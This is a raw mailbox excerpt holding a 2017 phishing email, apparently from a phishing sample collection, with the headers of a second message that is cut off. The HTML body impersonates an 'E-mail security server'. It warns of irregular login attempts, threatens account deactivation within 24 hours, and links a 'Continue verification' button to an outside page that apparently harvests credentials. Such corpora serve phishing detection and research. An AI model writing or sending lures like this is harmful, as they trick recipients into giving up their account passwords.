From: Mail Service <feedback@email-service.com>
Reply-To: 
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Message-Id: <E1ciOl6-000CjF-Cu@rikis.vdu.lt>
Date: Mon, 27 Feb 2017 19:06:48 +0200
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 88

              <tr id="yui_3_16_0_ym19_1_1481387917493_15068"><td id="yui_3_16_0_ym19_1_1481387917493_15067" colspan="3" height="6px"> </td></tr></tbody></table></td></tr>
	      <tr id="yui_3_16_0_ym19_1_1481387917493_15060"><td id="yui_3_16_0_ym19_1_1481387917493_15059">
              <table id="yui_3_16_0_ym19_1_1481387917493_15058" style="min-width:600px;overflow-x:auto;max-width:900px;border-width:0px 1px 1px;border-right-style:solid;border-left-style:solid;border-left-color:rgb(240, 240, 240);border-bottom-color:rgb(192, 192, 192);" bgcolor="#FAFAFA" border="0" cellpadding="0" cellspacing="0" width="100%">
	      <tbody id="yui_3_16_0_ym19_1_1481387917493_15057"><tr id="yui_3_16_0_ym19_1_1481387917493_15205" height="16px"><td rowspan="3" width="32px"> </td><td id="yui_3_16_0_ym19_1_1481387917493_15204"> </td>
	      <td id="yui_3_16_0_ym19_1_1481387917493_15327" rowspan="3" width="32px"> </td></tr><tr id="yui_3_16_0_ym19_1_1481387917493_15056"><td id="yui_3_16_0_ym19_1_1481387917493_15055"><table id="yui_3_16_0_ym19_1_1481387917493_15054" style="min-width:300px;" border="0" cellpadding="0" cellspacing="0">
	      <tbody id="yui_3_16_0_ym19_1_1481387917493_15053"><tr id="yui_3_16_0_ym19_1_1481387917493_15052"><td id="yui_3_16_0_ym19_1_1481387917493_15051" style="font-family:Roboto-Regular, Helvetica, Arial, sans-serif;font-size:13px;color:rgb(32, 32, 32);line-height:1.5;">
              <a id="yui_3_16_0_ym19_1_1481387917493_15208" rel="nofollow" target="_blank" href=""https://tse1.mm.bing.net/th?id=OIP.Mc4498caa7cfcd637d28fdb6198ede08bo0&pid=15.1&P=0&w=270&h=172;" style="">
              <span id="yui_3_16_0_ym19_1_1481387917493_15207" style="color:#000000;">
              <b id="yui_3_16_0_ym19_1_1481387917493_15325">Dear User,
,</b><div> </div><br>
	      Recently we received some notifications regarding your account which might be due<br> 

to recent changes made in your Settings or irregular login attempts on your account.<div> </div>
	     we will send you a 4 digit **** verification code to reclaim your account.<br><br> 
            </span></a><center id="yui_3_16_0_ym19_1_1481387917493_15065"><a rel="nofollow" target="_blank" href=""http://"" style="">
	</a><a id="yui_3_16_0_ym19_1_1481387917493_15064" rel="nofollow" target="_blank" href="http://www.acdc.co.za/builditweb.acdc.co.za/error_docs/valid.htm" style="font-size:12px;display:block;float:left;color:#FFFFFF;padding:10px 10px 10px 10px;margin:2px;background:#0174DF;">
	Continue verification
	</a>
	</center><br><br>
	<p id="yui_3_16_0_ym19_1_1481387917493_15062"><br>However, if you do not confirm your mailbox with 24hours, 

deactivation will be effected and <br> Your important emails might not be 

delivered.</p>
	        
	      <br><p id="yui_3_16_0_ym19_1_1481387917493_15253">Regards,<br>E-mail security server
<br> </p></td>
              </tr></tbody></table></td></tr></tbody></table></td></tr>
	      <tr height="16"></tr><tr><td style="overflow-x:auto;max-width:900px;font-size:10px;color:rgb(188, 188, 188);line-height:1.5;"> </td></tr>

<tr id="yui_3_16_0_ym19_1_1481387917493_15272"><td id="yui_3_16_0_ym19_1_1481387917493_15271">
              <table id="yui_3_16_0_ym19_1_1481387917493_15353" style="font-family:Roboto-Regular, Helvetica, Arial, sans-serif;font-size:10px;color:rgb(102, 102, 102);line-height:18px;padding-bottom:10px;">
	      <tbody id="yui_3_16_0_ym19_1_1481387917493_15357"><tr id="yui_3_16_0_ym19_1_1481387917493_15356"><td id="yui_3_16_0_ym19_1_1481387917493_15355"><span style="color:#424242;">You received this 

mandatory announcement to update you on important changes with your Email 

product.<br>This message is auto-generated from E-mail security server and 

replies sent to this email can not be delivered.<br> 

<b><font color="#045fb4">


</font></b></span></td></tr></tbody></table></td></tr></tbody>



From jose@monkey.org Tue Feb 28 11:45:05 2017 +0000
Return-Path: member.almxe.welcome.messagealert.aexpress@manx.net
Delivered-To: jose@monkey.org
X-FDA: 72565818570.11.silk61_2c5997c6a393a
X-Spam-Summary: 2,0,0,1fefa7a5bda2a02b,d41d8cd98f00b204,member.almxe.welcome.messagealert.aexpress@manx.net,:member.almxe.welcome.messagealert.aexpress@manx.net,RULES_HIT:41:152:327:355:379:677:871:962:967:969:973:981:988:989:1000:1147:1189:1260:1263:1313:1314:1345:1381:1432:1433:1434:1436:1437:1516:1517:1571:1575:1588:1589:1592:1594:1685:1730:1747:1764:1777:1792:1823:2107:2194:2198:2199:2200:2393:2525:2527:2539:2557:2559:2564:2639:2682:2685:2693:2734:2741:2859:2861:2890:2892:2895:2898:2900:2901:2911:2914:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3353:3585:3586:3769:3770:3863:3865:3867:3868:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4384:4425:4605:5007:6117:6119:6261:6354:6506:6678:6747:6748:7266:7281:7398:7774:7809:7903:7940:8516:8599:8603:9025:9108:9121:9388:9468:9868:10049:10265:10394:11233:11473:11604:11656:11658:11914:12043:12050:12663:12740:12895:12986:13139:13156:13192:13228:13229:14096:14659:
X-HE-Tag: silk61_2c5997c6a393a
X-Filterd-Recvd-Size: 41876
Received: from mail.ptera.net (mail.ptera.net [69.28.32.18])
	by imf17.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 28 Feb 2017 11:45:04 +0000 (UTC)
Received: from WIN-HRC4GF7IFH9.local (cust-11369.ptera.net [199.127.113.69])
	by mail.ptera.net (Postfix) with ESMTP id 43A55E61BE9;
	Tue, 28 Feb 2017 02:36:27 -0800 (PST)
